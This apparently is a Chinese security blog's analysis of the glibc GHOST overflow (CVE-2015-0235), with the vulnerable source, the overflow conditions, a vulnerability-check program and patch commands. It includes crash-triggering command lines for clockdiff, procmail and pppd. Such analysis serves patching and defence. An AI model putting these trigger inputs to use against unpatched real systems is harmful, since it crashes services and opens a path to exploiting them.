安全脉搏此前发布了最近被媒体炒的比较火的2015年第一个曝出的影响广泛的底层漏洞: CVE-2015-0235:Linux Glibc幽灵漏洞允许黑客远程获取系统权限
__nss_hostname_digits_dots(//glibc/nss/digits_dots.c)函数存在缓冲区溢出漏洞。
该bug通过gethostbyname *()系列函数触发,可远程执行。
__nss_hostname_digits_dots() 是从2.2.2开始引入的。
root@H:/tmp/glibc-2.17# grep -irF '__nss_hostname_digits_dots' ./* ./CANCEL-FCT-WAIVE:__nss_hostname_digits_dots ./ChangeLog.12: * nss/Versions (libc): Add __nss_hostname_digits_dots to GLIBC_2.2.2. ./ChangeLog.12: * nss/digits_dots.c (__nss_hostname_digits_dots): Turn template ---snip--- ./nss/getXXbyYY.c: if (__nss_hostname_digits_dots (name, &resbuf, &buffer, ./nss/Versions: __nss_hostname_digits_dots; ./nss/getXXbyYY_r.c: switch (__nss_hostname_digits_dots (name, resbuf, &buffer, NULL, ./nss/nsswitch.h:extern int __nss_hostname_digits_dots (const char *name, ./nss/nsswitch.h:libc_hidden_proto (__nss_hostname_digits_dots) ./nss/digits_dots.c:__nss_hostname_digits_dots (const char *name, struct hostent *resbuf, ./nss/digits_dots.c:libc_hidden_def (__nss_hostname_digits_dots)
查找得出该函数由glibc的重入和不可重入版本提供(nss/getXXbyYY.c 和 nss/getXXbyYY_r.c)
#ifdef HANDLE_DIGITS_DOTS
if (buffer != NULL) //if malloc memory success
{
if (__nss_hostname_digits_dots (name, &resbuf, &buffer,
&buffer_size, 0, &result, NULL, AF_VAL,
H_ERRNO_VAR_P))
goto done;
}
#endif
并由 HANDLE_DIGITS_DOTS 宏来定义
root@H:/tmp/glibc-2.17# grep -irF '#define HANDLE_DIGITS_DOTS' ./* ./inet/gethstbynm.c:#define HANDLE_DIGITS_DOTS 1 ./inet/gethstbynm2.c:#define HANDLE_DIGITS_DOTS 1 ./inet/gethstbynm_r.c:#define HANDLE_DIGITS_DOTS 1 ./inet/gethstbynm2_r.c:#define HANDLE_DIGITS_DOTS 1 ./nscd/gethstbynm3_r.c:#define HANDLE_DIGITS_DOTS 1
所以这几个文件对应的函数可能触发该漏洞,__nss_hostname_digits_dots()的目的是避免ipv4和ipv6的地址再去做dns解析导致资源浪费。
/* Copyright (C) 1997, 1999, 2000, 2001, 2004 Free Software Foundation, Inc.
This file is part of the GNU C Library.
Contributed by H.J. Lu <hjl@gnu.ai.mit.edu>, 1997.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<http://www.gnu.org/licenses/>. */
#include <assert.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#include <wctype.h>
#include <resolv.h>
#include <netdb.h>
#include <arpa/inet.h>
#include "nsswitch.h"
#ifdef USE_NSCD
# define inet_aton __inet_aton
# include <nscd/nscd_proto.h>
#endif
int
__nss_hostname_digits_dots (const char *name, struct hostent *resbuf,
char **buffer, size_t *buffer_size,
size_t buflen, struct hostent **result,
enum nss_status *status, int af, int *h_errnop)
{
int save;
/* We have to test for the use of IPv6 which can only be done by
examining `_res'. */
if (__res_maybe_init (&_res, 0) == -1)
{
if (h_errnop)
*h_errnop = NETDB_INTERNAL;
*result = NULL;
return -1;
}
/*
* disallow names consisting only of digits/dots, unless
* they end in a dot.
*/
if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':')
{
const char *cp;
char *hostname;
typedef unsigned char host_addr_t[16];
host_addr_t *host_addr;
typedef char *host_addr_list_t[2];
host_addr_list_t *h_addr_ptrs;
char **h_alias_ptr;
size_t size_needed;
int addr_size;
switch (af)
{
case AF_INET:
addr_size = INADDRSZ;
break;
case AF_INET6:
addr_size = IN6ADDRSZ;
break;
default:
af = (_res.options & RES_USE_INET6) ? AF_INET6 : AF_INET;
addr_size = af == AF_INET6 ? IN6ADDRSZ : INADDRSZ;
break;
}
size_needed = (sizeof (*host_addr)
+ sizeof (*h_addr_ptrs) + strlen (name) + 1);
if (buffer_size == NULL)
{
if (buflen < size_needed)
{
if (h_errnop != NULL)
*h_errnop = TRY_AGAIN;
__set_errno (ERANGE);
goto done;
}
}
else if (buffer_size != NULL && *buffer_size < size_needed)
{
char *new_buf;
*buffer_size = size_needed;
new_buf = (char *) realloc (*buffer, *buffer_size);
if (new_buf == NULL)
{
save = errno;
free (*buffer);
*buffer = NULL;
*buffer_size = 0;
__set_errno (save);
if (h_errnop != NULL)
*h_errnop = TRY_AGAIN;
*result = NULL;
goto done;
}
*buffer = new_buf;
}
memset (*buffer, '\0', size_needed);
host_addr = (host_addr_t *) *buffer;
h_addr_ptrs = (host_addr_list_t *)
((char *) host_addr + sizeof (*host_addr));
h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs));
hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr);
if (isdigit (name[0]))
{
for (cp = name;; ++cp)
{
if (*cp == '\0')
{
int ok;
if (*--cp == '.')
break;
/* All-numeric, no dot at the end. Fake up a hostent as if
we'd actually done a lookup. What if someone types
255.255.255.255? The test below will succeed
spuriously... ??? */
if (af == AF_INET)
ok = __inet_aton (name, (struct in_addr *) host_addr);
else
{
assert (af == AF_INET6);
ok = inet_pton (af, name, host_addr) > 0;
}
if (! ok)
{
*h_errnop = HOST_NOT_FOUND;
if (buffer_size)
*result = NULL;
goto done;
}
resbuf->h_name = strcpy (hostname, name);
h_alias_ptr[0] = NULL;
resbuf->h_aliases = h_alias_ptr;
(*h_addr_ptrs)[0] = (char *) host_addr;
(*h_addr_ptrs)[1] = NULL;
resbuf->h_addr_list = *h_addr_ptrs;
if (af == AF_INET && (_res.options & RES_USE_INET6))
{
/* We need to change the IP v4 address into the
IP v6 address. */
char tmp[INADDRSZ];
char *p = (char *) host_addr;
int i;
/* Save a copy of the IP v4 address. */
memcpy (tmp, host_addr, INADDRSZ);
/* Mark this ipv6 addr as a mapped ipv4. */
for (i = 0; i < 10; i++)
*p++ = 0x00;
*p++ = 0xff;
*p++ = 0xff;
/* Copy the IP v4 address. */
memcpy (p, tmp, INADDRSZ);
resbuf->h_addrtype = AF_INET6;
resbuf->h_length = IN6ADDRSZ;
}
else
{
resbuf->h_addrtype = af;
resbuf->h_length = addr_size;
}
if (h_errnop != NULL)
*h_errnop = NETDB_SUCCESS;
if (buffer_size == NULL)
*status = NSS_STATUS_SUCCESS;
else
*result = resbuf;
goto done;
}
if (!isdigit (*cp) && *cp != '.')
break;
}
}
if ((isxdigit (name[0]) && strchr (name, ':') != NULL) || name[0] == ':')
{
const char *cp;
char *hostname;
typedef unsigned char host_addr_t[16];
host_addr_t *host_addr;
typedef char *host_addr_list_t[2];
host_addr_list_t *h_addr_ptrs;
size_t size_needed;
int addr_size;
switch (af)
{
default:
af = (_res.options & RES_USE_INET6) ? AF_INET6 : AF_INET;
if (af == AF_INET6)
{
addr_size = IN6ADDRSZ;
break;
}
/* FALLTHROUGH */
case AF_INET:
/* This is not possible. We cannot represent an IPv6 address
in an `struct in_addr' variable. */
*h_errnop = HOST_NOT_FOUND;
*result = NULL;
goto done;
case AF_INET6:
addr_size = IN6ADDRSZ;
break;
}
size_needed = (sizeof (*host_addr)
+ sizeof (*h_addr_ptrs) + strlen (name) + 1);
if (buffer_size == NULL && buflen < size_needed)
{
if (h_errnop != NULL)
*h_errnop = TRY_AGAIN;
__set_errno (ERANGE);
goto done;
}
else if (buffer_size != NULL && *buffer_size < size_needed)
{
char *new_buf;
*buffer_size = size_needed;
new_buf = realloc (*buffer, *buffer_size);
if (new_buf == NULL)
{
save = errno;
free (*buffer);
__set_errno (save);
*buffer = NULL;
*buffer_size = 0;
*result = NULL;
goto done;
}
*buffer = new_buf;
}
memset (*buffer, '\0', size_needed);
host_addr = (host_addr_t *) *buffer;
h_addr_ptrs = (host_addr_list_t *)
((char *) host_addr + sizeof (*host_addr));
hostname = (char *) h_addr_ptrs + sizeof (*h_addr_ptrs);
for (cp = name;; ++cp)
{
if (!*cp)
{
if (*--cp == '.')
break;
/* All-IPv6-legal, no dot at the end. Fake up a
hostent as if we'd actually done a lookup. */
if (inet_pton (AF_INET6, name, host_addr) <= 0)
{
*h_errnop = HOST_NOT_FOUND;
if (buffer_size)
*result = NULL;
goto done;
}
resbuf->h_name = strcpy (hostname, name);
h_alias_ptr[0] = NULL;
resbuf->h_aliases = h_alias_ptr;
(*h_addr_ptrs)[0] = (char *) host_addr;
(*h_addr_ptrs)[1] = (char *) 0;
resbuf->h_addr_list = *h_addr_ptrs;
resbuf->h_addrtype = AF_INET6;
resbuf->h_length = addr_size;
*h_errnop = NETDB_SUCCESS;
if (buffer_size == NULL)
*status = NSS_STATUS_SUCCESS;
else
*result = resbuf;
goto done;
}
if (!isxdigit (*cp) && *cp != ':' && *cp != '.')
break;
}
}
}
return 0;
done:
return 1;
}
libc_hidden_def (__nss_hostname_digits_dots)
85行size_needed决定了缓存区的大小 只包括了 *host_addr, *h_addr_ptrs, name的大小,后面121行却存储着四个数据的地址,host_addr, h_addr_ptrs, h_alias_ptr, hostname, 在计算长度时漏掉了h_alias_ptr,即一个char指针的大小,32位为4个字节,64位为8个字节。88-117行保证缓存区足够大,88-97行是函数重入的分支,98-117是非重入的分支。157行的strcpy可以触发缓存区溢出。
为了在157行触发溢出,主机名必须符合下列条件:
- 它的第一个字符必须是数字(Ln 127) 。 - 它的最后一个字符不能是点 “.”(Ln 135 ) 。 - 它必须只包含数字和点(Ln 197 ) (我们称之为“数字和点”的要求) 。 - 它必须足够长以溢出缓冲区。例如,非重入的gethostbyname *()函数最开始就会通过调用malloc (1024)来分配自己的缓冲区 (申请 “1 KB”) 。 - 地址必须成功地解析为IPv4地址。该解析由INET_ATON()(Ln 143)完成 ,或作为inet_pton IPv6地址() (Ln 147)
但是经过分析inet_pton 和 inet_aton 这2个函数,得出如下结论(200行出的strcpy是处理ipv6的,由于ipv6的限制,不能触发溢出。)
147行的inet_ption中当吧hostname解析为ipv6的地址时,':'是不非法字符,所以地址族为AF_INET6时,是不会触发的。 inet_aton处是唯一一处可以出发溢出的,并且主机名必须具有一下格式:"a.b.c.d","a.b.c","a",a,b,c,d 必须是无符号整数,最大0xffffffff,可以被strtoul函数成功的转换为10进制或8进制(由于'x'和'X'在此处是非法字符,所以不能为16进制)
目前为止,下面的程序被证实存在该漏洞
clockdiff
root@h-virtual-machine:~# clockdiff $(python -c "print '0' * $((0x20000-16*1-2*4-1-4))") Segmentation fault (core dumped)
调用gethostbyname,执行__strdup时溢出
root@h-virtual-machine:~# ltrace clockdiff $(python -c "print '0' * $((0x20000-16*1-2*4-1-4))")
__libc_start_main(0x8048960, 2, 0xbfb52774, 0x8049cd0, 0x8049d40 <unfinished ...>
socket(2, 3, 1) = 3
__errno_location() = 0xb75d08c8
getuid() = 0
setuid(0) = 0
fileno(0xb7778ac0) = 0
isatty(0) = 1
fileno(0xb7778a20) = 1
isatty(1) = 1
getpid() = 9907
gethostname("h-virtual-machine", 1025) = 0
gethostbyname("h-virtual-machine") = 0xb777aef8
__strdup(0x91d502a, 1025, 1, 64, 4) = 0x91d55f0
gethostbyname("00000000000000000000000000000000"...) = 0xb777aef8
__strdup(0x91d5cec, 1025, 1, 64, 4 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
procmail
root@h-virtual-machine:~# ltrace /usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null
----snip---
socket(2, 2, 17) = 4
strlen("root@8:/var/mail/root") = 21
sendto(4, 0x83358c8, 21, 0, 0x805d7f8) = 21
close(4) = 0
strlen("procmail") = 8
memmove(0x8337168, 0x80580e3, 8, 0x10000000, 1) = 0x8337168
strlen(": ") = 2
memmove(0x8337170, 0x8058d78, 2, 0x10000000, 1) = 0x8337170
time(NULL) = 1422509804
strlen("Notified comsat:") = 16
memmove(0x8337172, 0x8059416, 16, 0x10000000, 1) = 0x8337172
strlen(" "") = 2
memmove(0x8337182, 0x80580ef, 2, 0, 0x8048838) = 0x8337182
strlen("root@8:/var/mail/root") = 21
memmove(0x8337184, 0x83358c8, 21, 0, 0x8048838) = 0x8337184
strlen(""\n") = 2
memmove(0x8337199, 0x80580ec, 2, 0x83358c8, 0x83358c8) = 0x8337199
write(2, "procmail: Notified comsat: "root"..., 51procmail: Notified comsat: "root@8:/var/mail/root"
) = 51
malloc(280) = 0x08337ee8
free(0x08337ee8*** glibc detected *** /usr/bin/procmail: free(): invalid next size (normal): 0x08337ee8 ***
由于破坏了内存结构,在free时出错。
pppd
root@h-virtual-machine:~# /usr/sbin/pppd 'dryrun' 'ms-dns' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255' *** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x09955920 *** ======= Backtrace: ========= /lib/i386-linux-gnu/libc.so.6(+0x75f12)[0xb75b6f12] /lib/i386-linux-gnu/libc.so.6(+0x65de5)[0xb75a6de5] /lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb75a6e1b] /usr/sbin/pppd(options_from_file+0xa8)[0x8064948] /usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e] /usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4] /usr/sbin/pppd(main+0x1cf)[0x8050b2f] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb755a4e3] ======= Memory map: ======== 08048000-08087000 r-xp 00000000 fd:01 11976 /usr/sbin/pppd 08087000-08088000 r--p 0003e000 fd:01 11976 /usr/sbin/pppd 08088000-0808c000 rw-p 0003f000 fd:01 11976 /usr/sbin/pppd 0808c000-080d9000 rw-p 00000000 00:00 0 09952000-09973000 rw-p 00000000 00:00 0 [heap] b74d5000-b74f1000 r-xp 00000000 fd:01 265720 /lib/i386-linux-gnu/libgcc_s.so.1 b74f1000-b74f2000 r--p 0001b000 fd:01 265720 /lib/i386-linux-gnu/libgcc_s.so.1 b74f2000-b74f3000 rw-p 0001c000 fd:01 265720 /lib/i386-linux-gnu/libgcc_s.so.1 b7503000-b750e000 r-xp 00000000 fd:01 265750 /lib/i386-linux-gnu/libnss_files-2.15.so b750e000-b750f000 r--p 0000a000 fd:01 265750 /lib/i386-linux-gnu/libnss_files-2.15.so b750f000-b7510000 rw-p 0000b000 fd:01 265750 /lib/i386-linux-gnu/libnss_files-2.15.so b7510000-b751a000 r-xp 00000000 fd:01 265754 /lib/i386-linux-gnu/libnss_nis-2.15.so b751a000-b751b000 r--p 00009000 fd:01 265754 /lib/i386-linux-gnu/libnss_nis-2.15.so b751b000-b751c000 rw-p 0000a000 fd:01 265754 /lib/i386-linux-gnu/libnss_nis-2.15.so b751c000-b7532000 r-xp 00000000 fd:01 265744 /lib/i386-linux-gnu/libnsl-2.15.so b7532000-b7533000 r--p 00015000 fd:01 265744 /lib/i386-linux-gnu/libnsl-2.15.so b7533000-b7534000 rw-p 00016000 fd:01 265744 /lib/i386-linux-gnu/libnsl-2.15.so b7534000-b7536000 rw-p 00000000 00:00 0 b7536000-b753d000 r-xp 00000000 fd:01 265746 /lib/i386-linux-gnu/libnss_compat-2.15.so b753d000-b753e000 r--p 00006000 fd:01 265746 /lib/i386-linux-gnu/libnss_compat-2.15.so b753e000-b753f000 rw-p 00007000 fd:01 265746 /lib/i386-linux-gnu/libnss_compat-2.15.so b753f000-b7541000 rw-p 00000000 00:00 0 b7541000-b76e5000 r-xp 00000000 fd:01 265699 /lib/i386-linux-gnu/libc-2.15.so b76e5000-b76e6000 ---p 001a4000 fd:01 265699 /lib/i386-linux-gnu/libc-2.15.so b76e6000-b76e8000 r--p 001a4000 fd:01 265699 /lib/i386-linux-gnu/libc-2.15.so b76e8000-b76e9000 rw-p 001a6000 fd:01 265699 /lib/i386-linux-gnu/libc-2.15.so b76e9000-b76ec000 rw-p 00000000 00:00 0 b76ec000-b7720000 r-xp 00000000 fd:01 5019 /usr/lib/i386-linux-gnu/libpcap.so.1.1.1 b7720000-b7721000 ---p 00034000 fd:01 5019 /usr/lib/i386-linux-gnu/libpcap.so.1.1.1 b7721000-b7722000 r--p 00034000 fd:01 5019 /usr/lib/i386-linux-gnu/libpcap.so.1.1.1 b7722000-b7723000 rw-p 00035000 fd:01 5019 /usr/lib/i386-linux-gnu/libpcap.so.1.1.1 b7723000-b7726000 r-xp 00000000 fd:01 265712 /lib/i386-linux-gnu/libdl-2.15.so b7726000-b7727000 r--p 00002000 fd:01 265712 /lib/i386-linux-gnu/libdl-2.15.so b7727000-b7728000 rw-p 00003000 fd:01 265712 /lib/i386-linux-gnu/libdl-2.15.so b7728000-b7734000 r-xp 00000000 fd:01 265761 /lib/i386-linux-gnu/libpam.so.0.83.0 b7734000-b7735000 r--p 0000b000 fd:01 265761 /lib/i386-linux-gnu/libpam.so.0.83.0 b7735000-b7736000 rw-p 0000c000 fd:01 265761 /lib/i386-linux-gnu/libpam.so.0.83.0 b7736000-b7737000 rw-p 00000000 00:00 0 b7737000-b773f000 r-xp 00000000 fd:01 265707 /lib/i386-linux-gnu/libcrypt-2.15.so b773f000-b7740000 r--p 00007000 fd:01 265707 /lib/i386-linux-gnu/libcrypt-2.15.so b7740000-b7741000 rw-p 00008000 fd:01 265707 /lib/i386-linux-gnu/libcrypt-2.15.so b7741000-b7768000 rw-p 00000000 00:00 0 b7768000-b776a000 r-xp 00000000 fd:01 265803 /lib/i386-linux-gnu/libutil-2.15.so b776a000-b776b000 r--p 00001000 fd:01 265803 /lib/i386-linux-gnu/libutil-2.15.so b776b000-b776c000 rw-p 00002000 fd:01 265803 /lib/i386-linux-gnu/libutil-2.15.so b777b000-b777e000 rw-p 00000000 00:00 0 b777e000-b777f000 r-xp 00000000 00:00 0 [vdso] b777f000-b779f000 r-xp 00000000 fd:01 265679 /lib/i386-linux-gnu/ld-2.15.so b779f000-b77a0000 r--p 0001f000 fd:01 265679 /lib/i386-linux-gnu/ld-2.15.so b77a0000-b77a1000 rw-p 00020000 fd:01 265679 /lib/i386-linux-gnu/ld-2.15.so bfbb6000-bfbd8000 rw-p 00000000 00:00 0 [stack] Aborted (core dumped)
pppd的ms-wins和socket选项也存在同样的问题。
glibc(补丁2013年5月21日就发布过了,不过没有引起重视).
查看有那些服务用了glibc, 用了这系列函数都有可能是潜在的威胁。
root@H:/tmp# lsof | grep libc | awk '{print $1}' | sort | uniq
accounts-
awk
bash
Cache
--snip--
gvfs-gpho
httpd
服务器上gethostbyname() 函数用的挺多。许多DNS解析服务都可能会和这个漏洞有关。毕竟是底层库,影响还是挺大的。
·邮件服务器连接IP时,使用的DNS反查,DNS黑名单,SPF等机制 ·表单提交时,绕过允许用户内容导致一个DNS查询时,比如URL,WordPress的XML-RPC pingback等 ·MySQL服务器做基于主机名的认证检查时(以MySQL权限) ·SSH服务器对允许/拒绝规则认证时,使用DNS查询的 ·php中也有部分文件引用了这个函数。
可以用ltrace命令来看下是否用到了getbyhostname这类函数。
DNS查询都可能会触发这个漏洞,幸运的是漏洞并不会立刻造成提权,但是结合其他的漏洞或者bug导致提权就不得而知了。
测试方法:
gcc secpulse.c -o CVE-2015-0235 ./CVE-2015-0235
secpulse.c
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };
int main(void) {
puts ("SecPulse.com Hint Your glibc version is:\t");
puts(gnu_get_libc_version ());
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;
/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
char name[sizeof(temp.buffer)];
memset(name, '0', len);
name[len] = '\0';
retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
if (strcmp(temp.canary, CANARY) != 0) {
puts("vulnerable");
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts("not vulnerable");
exit(EXIT_SUCCESS);
}
puts("should not happen");
exit(EXIT_FAILURE);
}
执行glibc升级命令
RHEL、Fedora、CentOS系统
yum update -y glibc --skip-broken
Debian、Ubuntu系统
apt-get clean && apt-get update && apt-get upgrade
update之后如果未生效,要重启依赖glibc的进程。
【本文来源:CVE 2015-0235:Ghost glibc 缓存区溢出漏洞分析 SP小编整理发布】
本文作者:SP小编
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/4440.html
必填 您当前尚未登录。 登录? 注册
必填(保密)